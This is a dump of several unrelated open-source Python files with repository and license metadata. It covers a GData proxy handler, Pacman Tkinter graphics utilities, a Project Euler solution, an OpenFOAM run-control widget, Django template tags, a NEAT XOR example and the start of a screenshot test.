def checkAccess(self):
self.check.canAccessGoogleDocs()
def get(self):
html = (
"<html><body><script type='text/javascript'>"
" window.opener.melange.gdata.loginSuccessful();"
" window.close();"
"</script></body></html>"
)
self.response.write(html)
class MakeRequest(RequestHandler):
"""Work as a proxy view and deliver JS request to GData server.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/make_request$', self, name='gdata_make_request')
]
return patterns
def checkAccess(self):
self.check.canAccessGoogleDocs()
def post(self):
params = self.request.POST
gdata_service = oauth_helper.createGDataService(self.data)
service_name = params['service_name']
method = params.get('method', 'GET')
data = simplejson.loads(params.get('data', '{}'))
url = params['url']
if not url.startswith('https'):
host = settings.GDATA_HOSTS[service_name]
url = 'https://%s%s' % (host, url)
alt = params.get('alt')
if alt == 'json':
url = url + '?alt=json'
headers = simplejson.loads(params.get('headers','{}'))
if not 'GData-Version' in headers:
headers['GData-Version'] = '1.0'
response = gdata_service.request(method, url, data, headers=headers)
response_data = response.read().decode('utf-8')
self.response.write(response_data)
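# Expected POST payload for MakeRequest, summarised from the code above (illustrative):
#   service_name : key into settings.GDATA_HOSTS, used when 'url' is not absolute
#   method       : HTTP verb, defaults to 'GET'
#   data         : JSON-encoded request body, defaults to '{}'
#   url          : target path or full https URL
#   alt          : optional; 'json' appends '?alt=json' to the URL
#   headers      : JSON-encoded dict; 'GData-Version' defaults to '1.0'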
|
apache-2.0
| 6,183,347,659,760,637,000
| 27.6
| 81
| 0.654463
| false
| 3.871019
| false
| false
| false
|
DominikDitoIvosevic/Uni
|
AI/lab2/graphicsUtils.py
|
1
|
11867
|
# graphicsUtils.py
# ----------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
import sys
import math
import random
import string
import time
import types
import Tkinter
#from PIL import ImageTk, Image
_Windows = sys.platform == 'win32' # True if on Win95/98/NT
_root_window = None # The root window for graphics output
_canvas = None # The canvas which holds graphics
_canvas_xs = None # Size of canvas object
_canvas_ys = None
_canvas_x = None # Current position on canvas
_canvas_y = None
_canvas_col = None # Current colour (set to black below)
_canvas_tsize = 12
_canvas_tserifs = 0
def formatColor(r, g, b):
return '#%02x%02x%02x' % (int(r * 255), int(g * 255), int(b * 255))
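# e.g. formatColor(1, 0.5, 0) == '#ff7f00' -- RGB floats in [0, 1] scaled to 0-255 hex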
def colorToVector(color):
return map(lambda x: int(x, 16) / 256.0, [color[1:3], color[3:5], color[5:7]])
if _Windows:
_canvas_tfonts = ['times new roman', 'lucida console']
else:
_canvas_tfonts = ['times', 'lucidasans-24']
pass # XXX need defaults here
def sleep(secs):
global _root_window
if _root_window == None:
time.sleep(secs)
else:
_root_window.update_idletasks()
_root_window.after(int(1000 * secs), _root_window.quit)
_root_window.mainloop()
def begin_graphics(width=640, height=480, color=formatColor(0, 0, 0), title=None):
global _root_window, _canvas, _canvas_x, _canvas_y, _canvas_xs, _canvas_ys, _bg_color
# Check for duplicate call
if _root_window is not None:
# Lose the window.
_root_window.destroy()
# Save the canvas size parameters
_canvas_xs, _canvas_ys = width - 1, height - 1
_canvas_x, _canvas_y = 0, _canvas_ys
_bg_color = color
# Create the root window
_root_window = Tkinter.Tk()
_root_window.protocol('WM_DELETE_WINDOW', _destroy_window)
_root_window.title(title or 'Graphics Window')
_root_window.resizable(0, 0)
# Create the canvas object
try:
_canvas = Tkinter.Canvas(_root_window, width=width, height=height)
_canvas.pack()
draw_background()
_canvas.update()
except:
_root_window = None
raise
# Bind to key-down and key-up events
_root_window.bind( "<KeyPress>", _keypress )
_root_window.bind( "<KeyRelease>", _keyrelease )
_root_window.bind( "<FocusIn>", _clear_keys )
_root_window.bind( "<FocusOut>", _clear_keys )
_root_window.bind( "<Button-1>", _leftclick )
_root_window.bind( "<Button-2>", _rightclick )
_root_window.bind( "<Button-3>", _rightclick )
_root_window.bind( "<Control-Button-1>", _ctrl_leftclick)
_clear_keys()
_leftclick_loc = None
_rightclick_loc = None
_ctrl_leftclick_loc = None
def _leftclick(event):
global _leftclick_loc
_leftclick_loc = (event.x, event.y)
def _rightclick(event):
global _rightclick_loc
_rightclick_loc = (event.x, event.y)
def _ctrl_leftclick(event):
global _ctrl_leftclick_loc
_ctrl_leftclick_loc = (event.x, event.y)
def wait_for_click():
while True:
global _leftclick_loc
global _rightclick_loc
global _ctrl_leftclick_loc
if _leftclick_loc != None:
val = _leftclick_loc
_leftclick_loc = None
return val, 'left'
if _rightclick_loc != None:
val = _rightclick_loc
_rightclick_loc = None
return val, 'right'
if _ctrl_leftclick_loc != None:
val = _ctrl_leftclick_loc
_ctrl_leftclick_loc = None
return val, 'ctrl_left'
sleep(0.05)
def draw_background():
corners = [(0,0), (0, _canvas_ys), (_canvas_xs, _canvas_ys), (_canvas_xs, 0)]
polygon(corners, _bg_color, fillColor=_bg_color, filled=True, smoothed=False)
def _destroy_window(event=None):
sys.exit(0)
# global _root_window
# _root_window.destroy()
# _root_window = None
#print "DESTROY"
def end_graphics():
global _root_window, _canvas, _mouse_enabled
try:
try:
sleep(1)
if _root_window != None:
_root_window.destroy()
except SystemExit, e:
print 'Ending graphics raised an exception:', e
finally:
_root_window = None
_canvas = None
_mouse_enabled = 0
_clear_keys()
def clear_screen(background=None):
global _canvas_x, _canvas_y
_canvas.delete('all')
draw_background()
_canvas_x, _canvas_y = 0, _canvas_ys
def polygon(coords, outlineColor, fillColor=None, filled=1, smoothed=1, behind=0, width=1):
c = []
for coord in coords:
c.append(coord[0])
c.append(coord[1])
if fillColor == None: fillColor = outlineColor
if filled == 0: fillColor = ""
poly = _canvas.create_polygon(c, outline=outlineColor, fill=fillColor, smooth=smoothed, width=width)
if behind > 0:
_canvas.tag_lower(poly, behind) # Higher should be more visible
return poly
def square(pos, r, color, filled=1, behind=0):
x, y = pos
coords = [(x - r, y - r), (x + r, y - r), (x + r, y + r), (x - r, y + r)]
return polygon(coords, color, color, filled, 0, behind=behind)
def circle(pos, r, outlineColor, fillColor, endpoints=None, style='pieslice', width=2):
x, y = pos
x0, x1 = x - r - 1, x + r
y0, y1 = y - r - 1, y + r
if endpoints == None:
e = [0, 359]
else:
e = list(endpoints)
while e[0] > e[1]: e[1] = e[1] + 360
return _canvas.create_arc(x0, y0, x1, y1, outline=outlineColor, fill=fillColor,
extent=e[1] - e[0], start=e[0], style=style, width=width)
def image(pos, file="../../blueghost.gif"):
x, y = pos
# img = PhotoImage(file=file)
#img = ImageTk.PhotoImage(Image.open(file))
return _canvas.create_image(x, y, image = Tkinter.PhotoImage(file=file), anchor = Tkinter.NW)
def refresh():
_canvas.update_idletasks()
def moveCircle(id, pos, r, endpoints=None):
global _canvas_x, _canvas_y
x, y = pos
# x0, x1 = x - r, x + r + 1
# y0, y1 = y - r, y + r + 1
x0, x1 = x - r - 1, x + r
y0, y1 = y - r - 1, y + r
if endpoints == None:
e = [0, 359]
else:
e = list(endpoints)
while e[0] > e[1]: e[1] = e[1] + 360
#edit(id, ('start', e[0]), ('extent', e[1] - e[0]))
move_to(id, x0, y0)
def edit(id, *args):
_canvas.itemconfigure(id, **dict(args))
def text(pos, color, contents, font='Helvetica', size=12, style='normal', anchor="nw"):
global _canvas_x, _canvas_y
x, y = pos
font = (font, str(size), style)
return _canvas.create_text(x, y, fill=color, text=contents, font=font, anchor=anchor)
def changeText(id, newText, font=None, size=12, style='normal'):
_canvas.itemconfigure(id, text=newText)
if font != None:
_canvas.itemconfigure(id, font=(font, '-%d' % size, style))
def changeColor(id, newColor):
_canvas.itemconfigure(id, fill=newColor)
def line(here, there, color=formatColor(0, 0, 0), width=2):
x0, y0 = here[0], here[1]
x1, y1 = there[0], there[1]
return _canvas.create_line(x0, y0, x1, y1, fill=color, width=width)
##############################################################################
### Keypress handling ########################################################
##############################################################################
# We bind to key-down and key-up events.
_keysdown = {}
_keyswaiting = {}
# This holds an unprocessed key release. We delay key releases by up to
# one call to keys_pressed() to get round a problem with auto repeat.
_got_release = None
def _keypress(event):
global _got_release
#remap_arrows(event)
_keysdown[event.keysym] = 1
_keyswaiting[event.keysym] = 1
# print event.char, event.keycode
_got_release = None
def _keyrelease(event):
global _got_release
#remap_arrows(event)
try:
del _keysdown[event.keysym]
except:
pass
_got_release = 1
def remap_arrows(event):
# TURN ARROW PRESSES INTO LETTERS (SHOULD BE IN KEYBOARD AGENT)
if event.char in ['a', 's', 'd', 'w']:
return
if event.keycode in [37, 101]: # LEFT ARROW (win / x)
event.char = 'a'
if event.keycode in [38, 99]: # UP ARROW
event.char = 'w'
if event.keycode in [39, 102]: # RIGHT ARROW
event.char = 'd'
if event.keycode in [40, 104]: # DOWN ARROW
event.char = 's'
def _clear_keys(event=None):
global _keysdown, _got_release, _keyswaiting
_keysdown = {}
_keyswaiting = {}
_got_release = None
def keys_pressed(d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT):
d_o_e(d_w)
if _got_release:
d_o_e(d_w)
return _keysdown.keys()
def keys_waiting():
global _keyswaiting
keys = _keyswaiting.keys()
_keyswaiting = {}
return keys
# Block for a list of keys...
def wait_for_keys():
keys = []
while keys == []:
keys = keys_pressed()
sleep(0.05)
return keys
def remove_from_screen(x,
d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT):
_canvas.delete(x)
d_o_e(d_w)
def _adjust_coords(coord_list, x, y):
for i in range(0, len(coord_list), 2):
coord_list[i] = coord_list[i] + x
coord_list[i + 1] = coord_list[i + 1] + y
return coord_list
def move_to(object, x, y=None,
d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT):
if y is None:
try: x, y = x
        except: raise Exception('incomprehensible coordinates')
horiz = True
newCoords = []
current_x, current_y = _canvas.coords(object)[0:2] # first point
for coord in _canvas.coords(object):
if horiz:
inc = x - current_x
else:
inc = y - current_y
horiz = not horiz
newCoords.append(coord + inc)
_canvas.coords(object, *newCoords)
d_o_e(d_w)
def move_by(object, x, y=None,
d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT, lift=False):
if y is None:
try: x, y = x
except: raise Exception, 'incomprehensible coordinates'
horiz = True
newCoords = []
for coord in _canvas.coords(object):
if horiz:
inc = x
else:
inc = y
horiz = not horiz
newCoords.append(coord + inc)
_canvas.coords(object, *newCoords)
d_o_e(d_w)
if lift:
_canvas.tag_raise(object)
def writePostscript(filename):
"Writes the current canvas to a postscript file."
psfile = file(filename, 'w')
psfile.write(_canvas.postscript(pageanchor='sw',
y='0.c',
x='0.c'))
psfile.close()
ghost_shape = [
(0, - 0.5),
(0.25, - 0.75),
(0.5, - 0.5),
(0.75, - 0.75),
(0.75, 0.5),
(0.5, 0.75),
(- 0.5, 0.75),
(- 0.75, 0.5),
(- 0.75, - 0.75),
(- 0.5, - 0.5),
(- 0.25, - 0.75)
]
if __name__ == '__main__':
begin_graphics()
clear_screen()
ghost_shape = [(x * 10 + 20, y * 10 + 20) for x, y in ghost_shape]
g = polygon(ghost_shape, formatColor(1, 1, 1))
move_to(g, (50, 50))
circle((150, 150), 20, formatColor(0.7, 0.3, 0.0), endpoints=[15, - 15])
sleep(2)
|
mit
| 2,995,610,118,131,092,000
| 28.593516
| 104
| 0.581444
| false
| 3.090365
| false
| false
| false
|
NoahBaird/Project-Euler
|
Problem 3 - Largest prime factor/Python 1.0.py
|
1
|
1112
|
from math import sqrt
def checkIfDone(num):
if num == 1:
return True
return False
def IsPrime(num):
    for i in range(2, int(sqrt(num)) + 1):
if num % i == 0:
return False
return True
def findLargestPrimeFactor(num):
done = False
largestFactor = 1
while num % 2 == 0:
num = num / 2
largestFactor = 2
done = checkIfDone(num)
while num % 3 == 0:
num = num / 3
largestFactor = 3
done = checkIfDone(num)
iterator = 1
while not done:
posPrime1 = iterator * 6 - 1
posPrime2 = iterator * 6 + 1
if IsPrime(posPrime1):
while num % posPrime1 == 0:
num = num / posPrime1
largestFactor = posPrime1
if IsPrime(posPrime2):
            while num % posPrime2 == 0:
num = num/posPrime2
largestFactor = posPrime2
done = checkIfDone(num)
iterator += 1
return largestFactor
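# Worked example from the problem statement: the prime factors of 13195 are
# 5, 7, 13 and 29, so findLargestPrimeFactor(13195) == 29.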
print findLargestPrimeFactor(600851475143)
|
mit
| 4,260,531,782,545,222,700
| 19.803922
| 42
| 0.504496
| false
| 3.915493
| false
| false
| false
|
jmarcelogimenez/petroSym
|
petroSym/run.py
|
1
|
11910
|
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 25 13:08:19 2015
@author: jgimenez
"""
from PyQt4 import QtGui, QtCore
from run_ui import Ui_runUI
from PyFoam.RunDictionary.ParsedParameterFile import ParsedParameterFile
import os
from reset import *
from time import localtime, strftime, struct_time
from logTab import *
from ExampleThread import *
from utils import *
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class runUI(QtGui.QScrollArea, Ui_runUI):
def __init__(self, parent=None, f=QtCore.Qt.WindowFlags()):
QtGui.QScrollArea.__init__(self, parent)
self.setupUi(self)
class runWidget(runUI):
def __init__(self, currentFolder, solvername):
runUI.__init__(self)
self.solvername = solvername
self.currentFolder = currentFolder
def setCurrentFolder(self, currentFolder, solvername):
self.currentFolder = currentFolder
self.solvername = solvername
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
        # If the GUI is opened while a case is already running, disable these buttons
if (self.window().runningpid!= -1):
self.pushButton_run.setEnabled(False)
self.pushButton_reset.setEnabled(False)
if self.window().nproc<=1:
self.type_serial.setChecked(True)
self.type_parallel.setChecked(False)
else:
self.type_serial.setChecked(False)
self.type_parallel.setChecked(True)
self.num_proc.setValue(self.window().nproc)
self.pushButton_decompose.setEnabled(False)
self.changeType()
def runCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
# if self.window().nproc>1:
# w = QtGui.QMessageBox(QtGui.QMessageBox.Information, "Is the case decomposed?", "Simulation will be done only if case decompositione was done previously. Continue?", QtGui.QMessageBox.Yes|QtGui.QMessageBox.No)
# ret = w.exec_()
# if(QtGui.QMessageBox.No == ret):
# return
        # modify the controlDict because the simulation may have been stopped
filename = '%s/system/controlDict'%self.currentFolder
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['stopAt'] = 'endTime'
parsedData.writeFile()
self.window().removeFilesPostPro()
        # backdate the controlDict edit by one minute
tt = list(localtime())
        tt[4] = (tt[4]-1)%60 # use modulo because when the minute is 0, 0-1 = -1
command = 'touch -d "%s" %s'%(strftime("%Y-%m-%d %H:%M:%S", struct_time(tuple(tt))),filename)
os.system(command)
filename1 = '%s/run.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Run',filename1)
if self.window().nproc<=1:
command = '%s -case %s 1> %s 2> %s &'%(self.solvername,self.currentFolder,filename1,filename2)
else:
command = 'mpirun -np %s %s -case %s -parallel 1> %s 2> %s & '%(str(self.window().nproc),self.solvername,self.currentFolder,filename1, filename2)
os.system(command)
if self.window().nproc<=1:
command = 'pidof %s'%self.solvername
else:
command = 'pidof mpirun'
import subprocess
self.window().runningpid = subprocess.check_output(command, shell=True)
        self.window().runningpid = self.window().runningpid.replace('\n','') # pidof returns the pid with trailing whitespace
        self.window().runningpid = int(self.window().runningpid) # and as a string, so convert it
self.window().save_config()
self.pushButton_run.setEnabled(False)
self.pushButton_reset.setEnabled(False)
self.window().tab_mesh.setEnabled(False)
self.window().refresh_pushButton.setEnabled(False)
leave = [1,5]
for i in range(self.window().treeWidget.topLevelItemCount()):
if i not in leave:
self.window().treeWidget.topLevelItem(i).setDisabled(True)
self.window().findChild(logTab,'%s/run.log'%self.currentFolder).findChild(QtGui.QPushButton,'pushButton_3').setEnabled(True)
self.window().updateLogFiles()
def changeType(self):
nprocOld = self.window().nproc
if self.type_serial.isChecked():
self.num_proc.setEnabled(False)
if nprocOld==1:
self.pushButton_decompose.setText('Apply')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/fromHelyx/save16.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
else:
self.pushButton_decompose.setText('Apply and Reconstruct Case')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/fromHelyx/reconstruct16.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_decompose.setIcon(icon)
self.pushButton_reconstruct.setEnabled(True)
            self.pushButton_reconstruct.setText("Reconstruct Case (use at your own risk)")
self.pushButton_decompose.setEnabled(True)
else:
self.num_proc.setEnabled(True)
self.pushButton_decompose.setText('Apply and Decompose Case')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/fromHelyx/decompose16.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_decompose.setIcon(icon)
self.pushButton_reconstruct.setEnabled(True)
            self.pushButton_reconstruct.setText("Reconstruct Case (use at your own risk)")
self.pushButton_decompose.setEnabled(True)
def resetCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
w = reset()
result = w.exec_()
if result:
self.window().nproc = 1
command = 'pyFoamClearCase.py %s %s'%(w.getParams(), self.currentFolder)
os.system(command)
#if w.deleteSnapshots():
# command = 'rm -rf %s/postProcessing/snapshots'%self.currentFolder
# os.system(command)
if w.resetFigures():
self.window().resetFigures(w.deletePostpro(),True)
filename = '%s/system/controlDict'%self.currentFolder
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['startFrom'] = 'startTime'
parsedData['startTime'] = '0'
parsedData.writeFile()
self.window().typeFile = {}
self.window().pending_files = []
self.window().pending_dirs = []
self.window().updateLogFiles()
self.type_serial.setChecked(True)
self.type_parallel.setChecked(False)
self.changeType()
self.window().save_config()
def decomposeCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
nprocOld = self.window().nproc
if self.type_serial.isChecked():
if nprocOld>1:
self.reconstructCase()
self.window().nproc = 1
else:
if nprocOld == self.num_proc.value():
QtGui.QMessageBox.about(self, "ERROR", "Case already decomposed.")
return
if nprocOld>1 and nprocOld != self.num_proc.value():
                QtGui.QMessageBox.about(self, "ERROR", "The case must be reconstructed before decomposing it with a different number of processors.")
return
self.window().nproc = self.num_proc.value()
        # If the time is zero, some fields must be filtered before decomposing
if self.currtime=='0':
            # Update the decomposition dictionary
filename = '%s/system/decomposeParDict'%(self.currentFolder)
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['numberOfSubdomains'] = self.window().nproc
parsedData.writeFile()
            # Decompose only the fields used by the solver; leave the rest untouched
command = 'mv %s %s.bak'%(self.timedir,self.timedir)
os.system(command)
command = 'mkdir %s'%(self.timedir)
os.system(command)
for ifield in self.fields:
command = 'cp %s.bak/%s %s/.'%(self.timedir,ifield,self.timedir)
os.system(command)
filename1 = '%s/decompose.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Decompose',filename1)
command = 'decomposePar -force -case %s -time %s 1> %s 2> %s'%(self.currentFolder,self.currtime,filename1,filename2)
os.system(command)
command = 'rm -r %s'%(self.timedir)
os.system(command)
command = 'mv %s.bak %s'%(self.timedir,self.timedir)
os.system(command)
else:
            # If the run has already advanced, everything must be decomposed
filename = '%s/system/decomposeParDict'%(self.currentFolder)
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['numberOfSubdomains'] = self.window().nproc
parsedData.writeFile()
filename1 = '%s/decompose.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Decompose',filename1)
command = 'decomposePar -force -case %s -time %s 1> %s 2> %s'%(self.currentFolder,self.currtime,filename1,filename2)
os.system(command)
self.window().save_config()
        w = QtGui.QMessageBox(QtGui.QMessageBox.Information,"Decompose Case","The case has been successfully decomposed!")
w.exec_()
w.repaint()
QtGui.QApplication.processEvents()
return
def reconstructCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
if int(self.currtime)==0:
QtGui.QMessageBox.about(self, "ERROR", "Time step 0 already exists")
return
else:
filename1 = '%s/reconstruct.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Reconstruct',filename1)
command = 'reconstructPar -case %s -time %s 1> %s 2> %s'%(self.currentFolder,self.currtime,filename1,filename2)
os.system(command)
            w = QtGui.QMessageBox(QtGui.QMessageBox.Information,"Reconstruct Case","The case has been successfully reconstructed!")
w.exec_()
w.repaint()
QtGui.QApplication.processEvents()
return
|
gpl-2.0
| 8,266,735,191,862,843,000
| 43.610487
| 222
| 0.594207
| false
| 4.007402
| false
| false
| false
|
palankai/xadrpy
|
src/xadrpy/core/templates/base.py
|
1
|
3454
|
from django import template
from django.utils.encoding import smart_str
import re
from django.template.base import FilterExpression, NodeList
from django.template.loader import get_template
kwarg_re = re.compile( r"(?:(\w+)=)?(.+)" )
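# Illustrative examples (not part of the original source) of how kwarg_re splits tag bits:
#   kwarg_re.match("limit=5").groups()      -> ("limit", "5")
#   kwarg_re.match("request.user").groups() -> (None, "request.user")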
class WidgetLibrary(template.Library):
def widget_tag_compile_function(self, cls, widget_name):
def widget_tag(parser, token):
"""
            {% xwidget 'some name' %}
            {% xwidget 'some name' as somevar %}
            {% xwidget 'some name' with 'template.html' as somevar %}
            {% xwidget 'some name' with variable as somevar %}
            {% xwidget 'some name' with-inline as somevar %}...{% endxwidget %}
            {% xwidget 'some name' with-inline %}...{% endxwidget %}
"""
bits = token.split_contents()
#widget_name = parser.compile_filter(bits[1])
args = []
kwargs = {}
asvar = None
templ = None
bits = bits[1:]
if len( bits ) >= 2 and bits[-2] == 'as':
asvar = bits[-1]
bits = bits[:-2]
if len( bits ) >=1 and bits[-1] == 'with-inline':
templ = True
bits = bits[:-1]
elif len( bits ) >=2 and bits[-2] == 'with':
templ = bits[-1]
bits = bits[:-2]
if len( bits ):
for bit in bits:
match = kwarg_re.match( bit )
if not match:
raise template.TemplateSyntaxError( "Malformed arguments to widget tag" )
name, value = match.groups()
if name:
kwargs[name] = parser.compile_filter( value )
else:
args.append( parser.compile_filter( value ) )
if templ == True:
templ = parser.parse(('end'+widget_name,))
parser.delete_first_token()
elif templ:
templ = parser.compile_filter( templ )
return cls(args, kwargs, templ, asvar)
return widget_tag
def widget(self, name):
def inner(cls):
self.tag(name, self.widget_tag_compile_function(cls, name))
return inner
class XWidgetBase(template.Node):
def __init__(self, args, kwargs, template, asvar):
self.args = args
self.kwargs = kwargs
self.template = template
self.asvar = asvar
def render(self, context):
def resolve(v, context):
if unicode(v)==u"False": return False
elif unicode(v)==u"True": return True
elif unicode(v)==u"None": return None
else:
return v.resolve(context)
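        # Illustrative note: literal "True"/"False"/"None" tokens in the tag become the
        # corresponding Python values; any other argument is resolved against the context.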
args = [arg.resolve( context ) for arg in self.args]
kwargs = dict( [( smart_str( k, 'ascii' ), resolve(v, context) ) for k, v in self.kwargs.items()] )
if isinstance(self.template, FilterExpression):
kwargs['TEMPLATE']=get_template(self.template.resolve( context ))
if isinstance(self.template, NodeList):
kwargs['TEMPLATE']=self.template
if not self.asvar:
return self.value(context, *args, **kwargs)
context[self.asvar]=self.value(context, *args, **kwargs)
return ""
def value(self, context, *args, **kwargs):
return ""
|
lgpl-3.0
| -5,177,239,194,537,481,000
| 37.808989
| 107
| 0.516503
| false
| 4.176542
| false
| false
| false
|
machinebrains/neat-python
|
examples/xor/xor2.py
|
1
|
1861
|
""" 2-input XOR example """
from __future__ import print_function
from neatsociety import nn, population, statistics, visualize
# Network inputs and expected outputs.
xor_inputs = [[0, 0], [0, 1], [1, 0], [1, 1]]
xor_outputs = [0, 1, 1, 0]
def eval_fitness(genomes):
for g in genomes:
net = nn.create_feed_forward_phenotype(g)
sum_square_error = 0.0
for inputs, expected in zip(xor_inputs, xor_outputs):
# Serial activation propagates the inputs through the entire network.
output = net.serial_activate(inputs)
sum_square_error += (output[0] - expected) ** 2
# When the output matches expected for all inputs, fitness will reach
# its maximum value of 1.0.
g.fitness = 1 - sum_square_error
pop = population.Population('xor2_config')
pop.run(eval_fitness, 300)
print('Number of evaluations: {0}'.format(pop.total_evaluations))
# Display the most fit genome.
winner = pop.statistics.best_genome()
print('\nBest genome:\n{!s}'.format(winner))
# Verify network output against training data.
print('\nOutput:')
winner_net = nn.create_feed_forward_phenotype(winner)
for inputs, expected in zip(xor_inputs, xor_outputs):
output = winner_net.serial_activate(inputs)
print("expected {0:1.5f} got {1:1.5f}".format(expected, output[0]))
# Visualize the winner network and plot/log statistics.
visualize.plot_stats(pop.statistics)
visualize.plot_species(pop.statistics)
visualize.draw_net(winner, view=True, filename="xor2-all.gv")
visualize.draw_net(winner, view=True, filename="xor2-enabled.gv", show_disabled=False)
visualize.draw_net(winner, view=True, filename="xor2-enabled-pruned.gv", show_disabled=False, prune_unused=True)
statistics.save_stats(pop.statistics)
statistics.save_species_count(pop.statistics)
statistics.save_species_fitness(pop.statistics)
|
bsd-3-clause
| -3,919,349,984,448,292,400
| 35.490196
| 112
| 0.709833
| false
| 3.259194
| false
| false
| false
|
SmileyChris/django-navtag
|
django_navtag/templatetags/navtag.py
|
1
|
5170
|
from django import template
from django.utils.encoding import smart_str
from django.utils.safestring import mark_safe
register = template.Library()
class Nav(object):
def __init__(self, tree=None, root=None):
self._root = root or self
self._tree = tree or {}
def __getitem__(self, key):
return Nav(self._tree[key], root=self._root)
def __str__(self):
return mark_safe(str(self._text))
def __bool__(self):
return bool(self._tree)
def _get_text(self):
if hasattr(self._root, "_text_value"):
return self._root._text_value
return self._tree
def _set_text(self, value):
self._root._text_value = value
_text = property(_get_text, _set_text)
def clear(self):
self._tree = {}
def update(self, *args, **kwargs):
self._tree.update(*args, **kwargs)
class NavNode(template.Node):
def __init__(self, item=None, var_for=None, var_text=None):
self.item = item
self.var_name = var_for or "nav"
self.text = var_text
def render(self, context):
first_context_stack = context.dicts[0]
nav = first_context_stack.get(self.var_name)
if nav is not context.get(self.var_name):
raise template.TemplateSyntaxError(
"'{0}' variable has been altered in current context".format(
self.var_name
)
)
if not isinstance(nav, Nav):
nav = Nav()
# Copy the stack to avoid leaking into other contexts.
new_first_context_stack = first_context_stack.copy()
new_first_context_stack[self.var_name] = nav
context.dicts[0] = new_first_context_stack
if self.text:
nav._text = self.text.resolve(context)
return ""
# If self.item was blank then there's nothing else to do here.
if not self.item:
return ""
if nav:
# If the nav variable is already set, don't do anything.
return ""
item = self.item.resolve(context)
item = item and smart_str(item)
value = True
if not item:
item = ""
for part in reversed(item.split(".")):
new_item = {}
new_item[part] = value
value = new_item
nav.clear()
nav.update(new_item)
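        # Illustrative example: {% nav "about_menu.info" %} leaves the tree as
        # {'about_menu': {'info': True}}, so nav.about_menu and nav.about_menu.info are both truthy.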
return ""
def __repr__(self):
return "<Nav node>"
@register.tag
def nav(parser, token):
"""
Handles navigation item selection.
Example usage::
{# Set the context so {{ nav.home }} (or {{ mynav.home }}) is True #}
{% nav "home" %} or {% nav "home" for mynav %}
The most basic (and common) use of the tag is to call ``{% nav [item] %}``,
where ``[item]`` is the item you want to check is selected.
By default, this tag creates a ``nav`` context variable. To use an
alternate context variable name, call ``{% nav [item] for [var_name] %}``.
Your HTML navigation template should look something like::
{% block nav %}
<ul class="nav">
<li{% if nav.home %} class="selected"{% endif %}>
<a href="/">Home</a>
</li>
<li{% if nav.about %} class="selected"{% endif %}>
<a href="/about/">About</a>
</li>
</ul>
{% endblock %}
To override this in a child template, you'd do::
        {% extends "base.html" %}
        {% load navtag %}
{% block nav %}
{% nav "about" %}
{{ block.super }}
{% endblock %}
This works for multiple levels of template inheritance, due to the fact
that the tag only does anything if the ``nav`` context variable does not
exist. So only the first ``{% nav %}`` call found will ever be processed.
As a shortcut, you can use a ``text`` argument and then just reference the
variable rather than query it with an ``{% if %}`` tag::
{% nav text ' class="active"' %}
<ul class="nav">
<li{{ nav.home }}><a href="/">Home</a></li>
<li{{ nav.about }}><a href="/about/">About</a></li>
</ul>
To create a sub-menu you can check against, simply dot-separate the item::
{% nav "about_menu.info" %}
    This will pass for both ``{% if nav.about_menu %}`` and
``{% if nav.about_menu.info %}``.
"""
bits = token.split_contents()
ok = True
keys = {"for": False, "text": True}
node_kwargs = {}
while len(bits) > 2:
value = bits.pop()
key = bits.pop()
if key not in keys:
ok = False
break
compile_filter = keys.pop(key)
if compile_filter:
value = parser.compile_filter(value)
node_kwargs["var_{0}".format(key)] = value
if len(bits) > 1:
# Text argument doesn't expect an item.
ok = "text" not in node_kwargs
item = parser.compile_filter(bits[1])
else:
item = None
if not ok:
raise template.TemplateSyntaxError("Unexpected format for %s tag" % bits[0])
return NavNode(item, **node_kwargs)
|
mit
| 2,733,805,172,510,658,000
| 28.20904
| 84
| 0.544874
| false
| 3.904834
| false
| false
| false
|
ponty/pyscreenshot
|
tests/size.py
|
1
|
1350
|
import os
from easyprocess import EasyProcess
from pyscreenshot.util import platform_is_linux, platform_is_osx, platform_is_win
def display_size_x():
